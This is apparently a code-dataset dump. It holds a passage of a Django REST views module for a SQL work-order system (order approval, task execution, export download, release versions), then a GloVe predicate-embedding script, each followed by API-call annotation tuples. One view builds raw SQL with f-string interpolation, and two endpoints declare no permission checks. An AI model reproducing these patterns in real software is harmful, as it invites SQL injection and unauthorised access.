message = '语法检查未发现异常,可以提交'
if not s:
message = '语法检查发现异常,详情请查看输出,更正后在提交'
d = {
'status': 0 if s else 1,
'data': data
}
data = {'columns': columns, 'data': d}
return JsonResponseV1(data=data, message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersCommit(GenericAPIView):
permission_classes = (permissions.CanCommitOrdersPermission,)
serializer_class = serializers.SqlOrdersCommitSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="提交成功")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersList(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrdersListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = SqlOrderListFilter
ordering = ['-created_at']
search_fields = ['title', 'database', 'remark', 'applicant', 'progress', 'contents']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'progress', 'value': '进度', 'width': '8%'},
{'key': 'applicant', 'value': '申请人'},
{'key': 'department', 'value': '部门'},
{'key': 'env_name', 'value': '环境'},
{'key': 'escape_title', 'value': '标题', 'width': '18%', 'ellipsis': True},
{'key': 'sql_type', 'value': '类型'},
{'key': 'remark', 'value': '备注'},
{'key': 'version', 'value': '版本'},
{'key': 'host', 'value': '实例/库'},
{'key': 'auditor', 'value': '审核人'},
{'key': 'reviewer', 'value': '复核人'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class SqlOrdersDetail(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrderDetailSerializer
lookup_field = 'order_id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class OpSqlOrderView(ViewSet):
"""更新SQL工单状态,如:审核,关闭等"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get_obj(self, pk):
try:
obj = models.DbOrders.objects.get(pk=pk)
return obj
except models.DbOrders.DoesNotExist:
raise Http404
def approve(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_approve"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def feedback(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_feedback"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def close(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_close"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def review(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_review"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
class GenerateTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.GenerateSqlOrdersTasksSerializer(data=request.data)
if serializer.is_valid():
data = serializer.save(request)
return JsonResponseV1(data=data)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTaskIdView(APIView):
def get(self, request, *args, **kwargs):
"""根据order id返回taskid"""
order_id = kwargs.get('order_id')
task_id = models.DbOrdersExecuteTasks.objects.filter(order_id=order_id).first().task_id
return JsonResponseV1(data=task_id)
class GetTasksPreviewView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
# 数据隐藏按钮打开了
# 仅允许申请人、审核人、复核人和超权用户查看数据
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
origin_queryset = self.queryset.filter(task_id=task_id)
total = origin_queryset.count()
progress_0 = origin_queryset.filter(progress=0).count()
progress_1 = origin_queryset.filter(progress=1).count()
progress_3 = origin_queryset.filter(progress=3).count()
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
{'key': 'num', 'value': '序号'}, # 自定义num,前台显示序号使用
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
{'key': 'result', 'value': '查看结果'}, # 自定义result
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns,
'data': {'data': serializer.data,
'total': total,
'progress_0': progress_0,
'progress_1': progress_1,
'progress_3': progress_3}}
return self.get_paginated_response(data)
class GetTasksListView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
# 数据隐藏按钮打开了
# 仅允许申请人、审核人、复核人和超权用户查看数据
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
{'key': 'num', 'value': '序号'}, # 自定义num,前台显示序号使用
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
{'key': 'execute', 'value': '执行'}, # 自定义execute
{'key': 'result', 'value': '查看结果'}, # 自定义result
]
if queryset.exists():
if queryset.first().sql_type == 'DDL':
render_columns.insert(-1, {'key': 'ghost_pause', 'value': '暂停(gh-ost)'})
render_columns.insert(-1, {'key': 'ghost_recovery', 'value': '恢复(gh-ost)'})
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ExecuteSingleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteSingleTaskSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ExecuteMultiTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteMultiTasksSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ThrottleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ThrottleTaskSerializer(data=request.data)
if serializer.is_valid():
message = serializer.execute(request)
return JsonResponseV1(message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTasksResultView(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.GetTasksResultSerializer
lookup_field = 'id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class HookSqlOrdersView(APIView):
permission_classes = (permissions.anyof(permissions.CanCommitOrdersPermission,
permissions.CanViewOrdersPermission,
permissions.CanExecuteOrdersPermission,
permissions.CanAuditOrdersPermission),
)
def post(self, request, *args, **kwargs):
serializer = serializers.HookSqlOrdersSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class DownloadExportFilesView(APIView):
"""下载导出文件"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get(self, request, base64_filename):
file_name = base64.b64decode(base64_filename).decode()
if not models.DbExportFiles.objects.filter(file_name=file_name).exists():
raise Http404
obj = models.DbExportFiles.objects.get(file_name=file_name)
if not models.DbOrdersExecuteTasks.objects.get(pk=obj.task_id).applicant == request.user.username:
raise PermissionDenied(detail='您没有权限')
fsock = open(f"media/{obj.files}", 'rb')
response = HttpResponse(fsock, content_type="application/zip")
response['Content-Disposition'] = f'attachment; filename={file_name}'
return response
class ReleaseVersionsGet(APIView):
"""获取上线版本号,提交工单使用"""
def get(self, request):
before_30_days = (timezone.now() - datetime.timedelta(days=30))
queryset = models.ReleaseVersions.objects.filter(
expire_time__gte=before_30_days
).values('id', 'version', 'expire_time').order_by('-created_at')
for row in queryset:
row['disabled'] = 0
if row['expire_time'] < datetime.datetime.date(timezone.now()):
row['disabled'] = 1
return JsonResponseV1(data=queryset)
class ReleaseVersionsList(ListAPIView):
"""获取上线版本号列表,管理上线版本号使用"""
permission_classes = (permissions.CanViewVersionPermission,)
queryset = models.ReleaseVersions.objects.all()
serializer_class = serializers.ReleaseVersionsListSerializer
pagination_class = Pagination
filter_backends = [filters.SearchFilter, filters.OrderingFilter]
search_fields = ['username', 'version', 'expire_time']
ordering = ['-created_at']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'version', 'value': '版本'},
{'key': 'username', 'value': '创建人'},
{'key': 'expire_time', 'value': '截止日期'},
{'key': 'created_at', 'value': '创建时间'},
{'key': 'key', 'value': '操作'},
{'key': 'id', 'value': '详情'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ReleaseVersionsCreate(CreateAPIView):
"""创建版本"""
permission_classes = (permissions.CanCreateVersionsPermission,)
serializer_class = serializers.ReleaseVersionsCreateSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
self.perform_create(serializer)
return JsonResponseV1(message="创建成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsUpdate(UpdateAPIView):
"""更新版本号,该类只更新单条记录"""
permission_classes = (permissions.CanUpdateVersionsPermission,)
def put(self, request, *args, **kwargs):
serializer = serializers.ReleaseVersionsSerializer(
instance=models.ReleaseVersions.objects.get(pk=kwargs['key']), # 返回单条记录
data=request.data
)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="更新成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsDelete(DestroyAPIView):
"""删除版本"""
permission_classes = (permissions.CanDeleteVersionsPermission,)
queryset = models.ReleaseVersions.objects.all()
lookup_field = 'id' # 默认为主键,可不写
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return JsonResponseV1(message="删除成功")
class ReleaseVersionsView(APIView):
"""获取指定版本内工单在所有环境的进度"""
def get(self, request, *args, **kwargs):
# 获取版本对应的主键
version = kwargs.get('version')
version_id = models.ReleaseVersions.objects.get(version=version).pk
# 获取环境,行转为动态列
obj = models.DbEnvironment.objects.values('id', 'name')
row2columns = ''
for row in obj:
row2columns += f"max(if(env_id={row['id']}, progress, -1)) as {row['name']},"
# 获取任务下所有工单分别在各个环境中的状态,此处的环境为动态环境
# id没有实际意义
query = f"select " + row2columns + \
f"substring(MD5(RAND()),1,20) as id,title as escape_title,order_id, applicant " \
f"from yasql_dborders where version_id='{version_id}' group by escape_title,order_id,applicant"
rawquery = models.DbOrders.objects.raw(query)
# 获取环境列名
dynamic_columns = list(rawquery.columns)[:-4]
data = []
for row in rawquery:
columns = {
'id': row.id,
'escape_title': row.escape_title,
'order_id': row.order_id,
'applicant': row.applicant,
}
for col in dynamic_columns:
columns[col] = getattr(row, col)
data.append(columns)
render_columns = [
{'key': 'escape_title', 'ellipsis': True, 'value': '标题'},
{'key': 'applicant', 'value': '申请人'},
]
render_columns.extend([{'key': x, 'value': x} for x in dynamic_columns])
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': data}
return JsonResponseV1(data=data)
| [((26, 15, 26, 49), 'sqlorders.models.DbEnvironment.objects.all', 'models.DbEnvironment.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((87, 15, 87, 44), 'sqlorders.models.DbOrders.objects.all', 'models.DbOrders.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((120, 15, 120, 44), 'sqlorders.models.DbOrders.objects.all', 'models.DbOrders.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((201, 15, 201, 56), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((252, 15, 252, 56), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((334, 15, 334, 56), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((398, 15, 398, 51), 'sqlorders.models.ReleaseVersions.objects.all', 'models.ReleaseVersions.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((453, 15, 453, 51), 'sqlorders.models.ReleaseVersions.objects.all', 'models.ReleaseVersions.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((32, 15, 32, 51), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((38, 21, 38, 79), 'sqlorders.serializers.DbSchemasSerializer', 'serializers.DbSchemasSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((41, 15, 41, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((46, 21, 46, 78), 'sqlorders.serializers.IncepSyntaxCheckSerializer', 'serializers.IncepSyntaxCheckSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((69, 15, 69, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((82, 15, 82, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((112, 18, 112, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(112, 41, 112, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((127, 15, 127, 51), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((149, 15, 149, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((158, 15, 158, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((167, 15, 167, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((176, 15, 176, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((183, 21, 183, 84), 'sqlorders.serializers.GenerateSqlOrdersTasksSerializer', 'serializers.GenerateSqlOrdersTasksSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((188, 15, 188, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((196, 15, 196, 43), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((240, 18, 240, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(240, 41, 240, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((290, 18, 290, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(290, 41, 290, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((299, 21, 299, 79), 'sqlorders.serializers.ExecuteSingleTaskSerializer', 'serializers.ExecuteSingleTaskSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((304, 15, 304, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((311, 21, 311, 79), 'sqlorders.serializers.ExecuteMultiTasksSerializer', 'serializers.ExecuteMultiTasksSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((316, 15, 316, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((323, 21, 323, 74), 'sqlorders.serializers.ThrottleTaskSerializer', 'serializers.ThrottleTaskSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((328, 15, 328, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((341, 15, 341, 51), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((345, 26, 348, 81), 'libs.permissions.anyof', 'permissions.anyof', ({(345, 44, 345, 81): 'permissions.CanCommitOrdersPermission', (346, 44, 346, 79): 'permissions.CanViewOrdersPermission', (347, 44, 347, 82): 'permissions.CanExecuteOrdersPermission', (348, 44, 348, 80): 'permissions.CanAuditOrdersPermission'}, {}), '(permissions.CanCommitOrdersPermission, permissions.\n CanViewOrdersPermission, permissions.CanExecuteOrdersPermission,\n permissions.CanAuditOrdersPermission)', False, 'from libs import permissions\n'), ((352, 21, 352, 75), 'sqlorders.serializers.HookSqlOrdersSerializer', 'serializers.HookSqlOrdersSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((357, 15, 357, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((370, 14, 370, 67), 'sqlorders.models.DbExportFiles.objects.get', 'models.DbExportFiles.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((375, 19, 375, 70), 'django.http.HttpResponse', 'HttpResponse', (), '', False, 'from django.http import Http404, HttpResponse\n'), ((392, 15, 392, 44), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((417, 18, 417, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(417, 41, 417, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((432, 15, 432, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((447, 15, 447, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((459, 15, 459, 53), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((470, 14, 470, 63), 'sqlorders.models.DbEnvironment.objects.values', 'models.DbEnvironment.objects.values', ({(470, 50, 470, 54): '"""id"""', (470, 56, 470, 62): '"""name"""'}, {}), "('id', 'name')", False, 'from sqlorders import models, serializers\n'), ((479, 19, 479, 53), 'sqlorders.models.DbOrders.objects.raw', 'models.DbOrders.objects.raw', ({(479, 47, 479, 52): 'query'}, {}), '(query)', False, 'from sqlorders import models, serializers\n'), ((499, 18, 499, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(499, 41, 499, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((501, 15, 501, 40), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((40, 19, 40, 56), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((59, 22, 59, 60), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(59, 45, 59, 59): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((68, 19, 68, 61), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((81, 19, 81, 57), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((136, 18, 136, 52), 'sqlorders.models.DbOrders.objects.get', 'models.DbOrders.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((148, 19, 148, 79), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((157, 19, 157, 79), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((166, 19, 166, 79), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((175, 19, 175, 79), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((187, 19, 187, 44), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((303, 19, 303, 81), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((315, 19, 315, 81), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((327, 19, 327, 50), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((356, 19, 356, 81), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((372, 18, 372, 60), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', (), '', False, 'from rest_framework.exceptions import PermissionDenied\n'), ((384, 26, 384, 40), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((384, 43, 384, 70), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((431, 19, 431, 57), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((446, 19, 446, 57), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((468, 21, 468, 72), 'sqlorders.models.ReleaseVersions.objects.get', 'models.ReleaseVersions.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((223, 22, 223, 132), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', (), '', False, 'from rest_framework.exceptions import PermissionDenied\n'), ((274, 22, 274, 132), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', (), '', False, 'from rest_framework.exceptions import PermissionDenied\n'), ((365, 20, 365, 53), 'base64.b64decode', 'base64.b64decode', ({(365, 37, 365, 52): 'base64_filename'}, {}), '(base64_filename)', False, 'import base64\n'), ((441, 21, 441, 73), 'sqlorders.models.ReleaseVersions.objects.get', 'models.ReleaseVersions.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((195, 18, 195, 79), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', (), '', False, 'from sqlorders import models, serializers\n'), ((367, 15, 367, 71), 'sqlorders.models.DbExportFiles.objects.filter', 'models.DbExportFiles.objects.filter', (), '', False, 'from sqlorders import models, serializers\n'), ((371, 15, 371, 70), 'sqlorders.models.DbOrdersExecuteTasks.objects.get', 'models.DbOrdersExecuteTasks.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((390, 59, 390, 73), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((220, 58, 220, 81), 'json.loads', 'json.loads', ({(220, 69, 220, 80): 'obj.auditor'}, {}), '(obj.auditor)', False, 'import json\n'), ((221, 58, 221, 82), 'json.loads', 'json.loads', ({(221, 69, 221, 81): 'obj.reviewer'}, {}), '(obj.reviewer)', False, 'import json\n'), ((271, 58, 271, 81), 'json.loads', 'json.loads', ({(271, 69, 271, 80): 'obj.auditor'}, {}), '(obj.auditor)', False, 'import json\n'), ((272, 58, 272, 82), 'json.loads', 'json.loads', ({(272, 69, 272, 81): 'obj.reviewer'}, {}), '(obj.reviewer)', False, 'import json\n'), ((385, 19, 387, 9), 'sqlorders.models.ReleaseVersions.objects.filter', 'models.ReleaseVersions.objects.filter', (), '', False, 'from sqlorders import models, serializers\n'), ((216, 15, 216, 74), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', (), '', False, 'from sqlorders import models, serializers\n'), ((267, 15, 267, 74), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', (), '', False, 'from sqlorders import models, serializers\n')] |
shmakn99/Knowledge-Graph-VG | perp_adj.py | ce2b0d6e16199357f1afc4aa7e58f74aae35e023 | import glove_util as gut
import numpy as np
from sklearn.decomposition import TruncatedSVD
import json
with open('freq_count_pred.json') as f:
freq_count_pred = json.load(f)
def get_pc(sentences):
svd = TruncatedSVD(n_components=1, n_iter=7, random_state=0)
svd.fit(sentences)
return svd.components_
def weighted_avg(predicate,a,dim):
predicate = predicate.lower().strip().split()
if len(predicate) == 1:
return gut.glove(predicate[0],dim)
else:
support = np.zeros(dim)
for word in predicate:
vector = gut.glove(word,dim)
if len(vector) == 0:
vector = np.zeros(300)
support += (a/(a+freq_count_pred[word]))*vector
return support
with open('relationships.json') as f:
relationships = json.load(f)
predicate_embedding = {}
sentences = []
i = 0
for image in relationships:
i+=1
if i%1000 == 0:
print (i)
for relation in image['relationships']:
w_avg = weighted_avg(relation['predicate'],0.001,300)
sentences.append(w_avg)
predicate_embedding[relation['relationship_id']] = w_avg
pc = get_pc(np.array(sentences))[0]
projection_space = np.outer(pc,pc)
i = 0
for image in relationships:
i+=1
if i%1000 == 0:
print (i)
for relation in image['relationships']:
predicate_embedding[relation['relationship_id']] = predicate_embedding[relation['relationship_id']] - np.matmul(projection_space,predicate_embedding[relation['relationship_id']])
with open('predicate_embedding_300.json','w') as f:
json.dump(predicate_embedding,f)
| [((52, 19, 52, 34), 'numpy.outer', 'np.outer', ({(52, 28, 52, 30): 'pc', (52, 31, 52, 33): 'pc'}, {}), '(pc, pc)', True, 'import numpy as np\n'), ((7, 19, 7, 31), 'json.load', 'json.load', ({(7, 29, 7, 30): 'f'}, {}), '(f)', False, 'import json\n'), ((10, 7, 10, 61), 'sklearn.decomposition.TruncatedSVD', 'TruncatedSVD', (), '', False, 'from sklearn.decomposition import TruncatedSVD\n'), ((35, 17, 35, 29), 'json.load', 'json.load', ({(35, 27, 35, 28): 'f'}, {}), '(f)', False, 'import json\n'), ((65, 1, 65, 33), 'json.dump', 'json.dump', ({(65, 11, 65, 30): 'predicate_embedding', (65, 31, 65, 32): 'f'}, {}), '(predicate_embedding, f)', False, 'import json\n'), ((20, 9, 20, 36), 'glove_util.glove', 'gut.glove', ({(20, 19, 20, 31): 'predicate[0]', (20, 32, 20, 35): 'dim'}, {}), '(predicate[0], dim)', True, 'import glove_util as gut\n'), ((22, 12, 22, 25), 'numpy.zeros', 'np.zeros', ({(22, 21, 22, 24): 'dim'}, {}), '(dim)', True, 'import numpy as np\n'), ((51, 12, 51, 31), 'numpy.array', 'np.array', ({(51, 21, 51, 30): 'sentences'}, {}), '(sentences)', True, 'import numpy as np\n'), ((24, 12, 24, 31), 'glove_util.glove', 'gut.glove', ({(24, 22, 24, 26): 'word', (24, 27, 24, 30): 'dim'}, {}), '(word, dim)', True, 'import glove_util as gut\n'), ((61, 105, 61, 181), 'numpy.matmul', 'np.matmul', ({(61, 115, 61, 131): 'projection_space', (61, 132, 61, 180): "predicate_embedding[relation['relationship_id']]"}, {}), "(projection_space, predicate_embedding[relation['relationship_id']])", True, 'import numpy as np\n'), ((26, 13, 26, 26), 'numpy.zeros', 'np.zeros', ({(26, 22, 26, 25): '300'}, {}), '(300)', True, 'import numpy as np\n')] |
